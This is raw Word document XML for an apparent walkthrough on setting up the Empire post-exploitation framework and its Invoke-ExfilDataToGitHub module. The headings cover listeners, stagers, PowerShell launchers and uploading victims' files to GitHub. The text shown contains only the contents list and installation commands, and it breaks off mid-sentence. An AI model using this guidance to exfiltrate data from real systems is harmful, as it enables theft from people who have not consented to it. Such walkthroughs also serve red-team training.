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3C8" w:rsidRPr="00352571" w:rsidRDefault="00CB3618" w:rsidP="00A343C8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Empire and Inv</w:t>
      </w:r>
      <w:r w:rsidR="001F7306">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>oke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F7306">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ExfilDataToGitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F7306">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:r w:rsidR="00397C3E">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0</w:t>
      </w:r>
      <w:r w:rsidR="001F7306">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Walk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>through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6826179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343C8" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00A343C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374238" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Initial Setup</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374238 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374239" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Empire Configuration and Exploitation Setup</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374239 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374240" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a Listener</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374240 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374241" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a Stager</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374241 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5F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4374242" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PowerShell launcher</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374242 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374243" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Use Invoke-ExfilDataToGitHub Module</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374243 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374244" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Select the Invoke-ExfilDatatoGitHub Module</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374244 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374245" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Upload all files recursively</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374246" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Upload selected files</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B073BF" w:rsidRDefault="00751E5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4374247" w:history="1">
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF" w:rsidRPr="00870230">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Upload file with data using PowerShell command</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464374247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00B073BF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00A343C8" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00A343C8" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A343C8" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A343C8" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F7306" w:rsidRDefault="001F7306" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D1FC2" w:rsidRPr="008C6689" w:rsidRDefault="007D1FC2" w:rsidP="00A343C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A343C8" w:rsidRPr="00E2315A" w:rsidRDefault="00A343C8" w:rsidP="00A343C8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc464374238"/>
      <w:bookmarkStart w:id="1" w:name="InitialSetup"/>
      <w:r w:rsidRPr="00E2315A">
        <w:lastRenderedPageBreak/>
        <w:t>Initial Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00397C3E">
        <w:t xml:space="preserve"> (Note: screenshots have not been updated for 2.0 but should be similar)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="008638E4" w:rsidRDefault="008638E4" w:rsidP="00A343C8">
      <w:r>
        <w:t>Download the Empire source code from here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008638E4" w:rsidRDefault="00751E5F" w:rsidP="00A343C8">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="008638E4" w:rsidRPr="00C474E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/adaptivethreat/Empire</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008638E4" w:rsidRDefault="008638E4" w:rsidP="008638E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C474E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/adaptivethreat/Empire</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008638E4" w:rsidRDefault="008638E4" w:rsidP="00A343C8"/>
    <w:p w:rsidR="005F70A6" w:rsidRDefault="005F70A6" w:rsidP="00A343C8">
      <w:r>
        <w:t xml:space="preserve">See this YouTube video for more details: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00BE0ECD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=aDeJBe6eqps</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008638E4" w:rsidRDefault="008638E4" w:rsidP="00A343C8">
      <w:r>
        <w:t>Run and execute setup_database.py and install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A343C8" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>python setup_database.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>./install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># Note you can reset the database using </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>./reset.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRPr="008C6689" w:rsidRDefault="00C43AF4" w:rsidP="00C43AF4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C43AF4" w:rsidRDefault="00C43AF4" w:rsidP="00A343C8"/>
    <w:p w:rsidR="00531ABE" w:rsidRDefault="00531ABE" w:rsidP="00A343C8">
      <w:r>
        <w:t>If the integration script and PowerShell module has not been accepted into the Empire framework then you can download the scripts from my GitHub account here</w:t>
      </w:r>
      <w:r w:rsidR="00397C3E">
        <w:t xml:space="preserve"> (select 2.0 branch)</w:t>
      </w:r>
